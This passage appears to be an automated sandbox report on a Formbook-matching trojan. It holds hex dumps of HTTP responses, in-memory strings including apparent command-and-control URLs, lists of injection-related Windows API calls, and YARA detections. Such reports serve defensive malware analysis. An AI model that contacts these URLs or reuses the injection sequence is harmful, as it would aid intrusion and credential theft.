65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: URUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nobartv6.website
Source: URUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nobartv6.website/pp43/
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000005.00000002.3982015331.000000000313C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000005.00000003.2648034206.0000000007F7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000005.00000002.3982015331.000000000313C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005408000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004478000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F9D8000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukW
Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046DC80
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 0_2_0044C37A
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C81C

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C063 NtClose, 2_2_0042C063
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk, 2_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk, 2_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A74340 NtSetContextThread, 2_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A74650 NtSuspendThread, 2_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72BA0 NtEnumerateValueKey, 2_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72B80 NtQueryInformationFile, 2_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72BE0 NtQueryValueKey, 2_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72BF0 NtAllocateVirtualMemory, 2_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72AB0 NtWaitForSingleObject, 2_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72AF0 NtWriteFile, 2_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72AD0 NtReadFile, 2_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FA0 NtQuerySection, 2_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FB0 NtResumeThread, 2_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F90 NtProtectVirtualMemory, 2_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FE0 NtCreateFile, 2_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F30 NtCreateSection, 2_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F60 NtCreateProcessEx, 2_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken, 2_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72E80 NtReadVirtualMemory, 2_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72EE0 NtQueueApcThread, 2_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72E30 NtWriteVirtualMemory, 2_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72DB0 NtEnumerateKey, 2_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72DD0 NtDelayExecution, 2_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D30 NtUnmapViewOfSection, 2_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D00 NtSetInformationFile, 2_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D10 NtMapViewOfSection, 2_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72CA0 NtQueryInformationToken, 2_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72CF0 NtOpenProcess, 2_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72CC0 NtQueryVirtualMemory, 2_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72C00 NtQueryInformationProcess, 2_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72C60 NtCreateKey, 2_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73090 NtSetValueKey, 2_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73010 NtOpenDirectoryObject, 2_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A739B0 NtGetContextThread, 2_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73D10 NtOpenProcessToken, 2_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73D70 NtOpenThread, 2_2_03A73D70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B4340 NtSetContextThread,LdrInitializeThunk, 5_2_037B4340
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B4650 NtSuspendThread,LdrInitializeThunk, 5_2_037B4650
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2B60 NtClose,LdrInitializeThunk, 5_2_037B2B60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_037B2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_037B2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_037B2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2AF0 NtWriteFile,LdrInitializeThunk, 5_2_037B2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2AD0 NtReadFile,LdrInitializeThunk, 5_2_037B2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2F30 NtCreateSection,LdrInitializeThunk, 5_2_037B2F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2FE0 NtCreateFile,LdrInitializeThunk, 5_2_037B2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2FB0 NtResumeThread,LdrInitializeThunk, 5_2_037B2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_037B2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_037B2E80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_037B2D30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_037B2D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_037B2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_037B2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_037B2C70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2C60 NtCreateKey,LdrInitializeThunk, 5_2_037B2C60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_037B2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B35C0 NtCreateMutant,LdrInitializeThunk, 5_2_037B35C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B39B0 NtGetContextThread,LdrInitializeThunk, 5_2_037B39B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2B80 NtQueryInformationFile, 5_2_037B2B80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2AB0 NtWaitForSingleObject, 5_2_037B2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2F60 NtCreateProcessEx, 5_2_037B2F60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2FA0 NtQuerySection, 5_2_037B2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2F90 NtProtectVirtualMemory, 5_2_037B2F90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2E30 NtWriteVirtualMemory, 5_2_037B2E30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2EA0 NtAdjustPrivilegesToken, 5_2_037B2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2D00 NtSetInformationFile, 5_2_037B2D00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2DB0 NtEnumerateKey, 5_2_037B2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2C00 NtQueryInformationProcess, 5_2_037B2C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2CF0 NtOpenProcess, 5_2_037B2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B2CC0 NtQueryVirtualMemory, 5_2_037B2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B3010 NtOpenDirectoryObject, 5_2_037B3010
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B3090 NtSetValueKey, 5_2_037B3090
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B3D70 NtOpenThread, 5_2_037B3D70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B3D10 NtOpenProcessToken, 5_2_037B3D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D68E60 NtReadFile, 5_2_02D68E60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D68F50 NtDeleteFile, 5_2_02D68F50
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D68CF0 NtCreateFile, 5_2_02D68CF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D69000 NtClose, 5_2_02D69000
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D69160 NtAllocateVirtualMemory, 5_2_02D69160
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00431BE8
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00446313
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004096A0 0_2_004096A0
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0042200C 0_2_0042200C
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0041A217 0_2_0041A217
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00412216 0_2_00412216
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0042435D 0_2_0042435D
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004033C0 0_2_004033C0
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004125E8 0_2_004125E8
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044663B 0_2_0044663B
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00413801 0_2_00413801
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0042096F 0_2_0042096F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004129D0 0_2_004129D0
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004119E3 0_2_004119E3
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0041C9AE 0_2_0041C9AE
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0047EA6F 0_2_0047EA6F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040FA10 0_2_0040FA10
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044EB5F 0_2_0044EB5F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00423C81 0_2_00423C81
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00411E78 0_2_00411E78
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00442E0C 0_2_00442E0C
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00420EC0 0_2_00420EC0
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044CF17 0_2_0044CF17
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00444FD2 0_2_00444FD2
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_040D4608 0_2_040D4608
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418113 2_2_00418113
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F9C3 2_2_0040F9C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F9BC 2_2_0040F9BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402209 2_2_00402209
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402210 2_2_00402210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004162FE 2_2_004162FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004162BC 2_2_004162BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416303 2_2_00416303
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FBE3 2_2_0040FBE3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DC63 2_2_0040DC63
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402DC0 2_2_00402DC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042E653 2_2_0042E653
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E3F0 2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B003E6 2_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFA352 2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC02C0 2_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF41A2 2_2_03AF41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B001AA 2_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF81CC 2_2_03AF81CC
